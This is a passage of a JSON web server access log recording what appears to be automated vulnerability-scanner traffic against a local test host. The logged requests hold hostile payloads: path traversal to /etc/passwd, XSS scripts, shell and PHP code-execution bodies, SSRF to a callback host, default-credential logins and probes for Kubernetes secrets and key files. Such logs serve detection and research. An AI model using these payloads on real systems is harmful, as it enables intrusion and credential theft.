"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wp/v2/users/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=ZxUYOh&adminpassword=11N78q&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/project?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"command=delete%20cli%20alias%20private%20list","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/29KD1wDFVpbJe9RZ5khe3QTyqIX.php&data=HACKERMAN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/backend1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/62 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linusadmin-phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/29KD1wDFVpbJe9RZ5khe3QTyqIX.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/sendmail HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KD1tVFflTBJqmBl2h3r7GzfIa.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/63 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:50 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/config/1.0/directory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://ca28fg0smpvbd3qg07h03biqaf4r56qcc.oast.live%23.salesforce.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /OA_HTML/lcmServiceController.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22prom-operator\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/64 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"loginUsername=admin&loginPassword=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/submitLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:51 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A 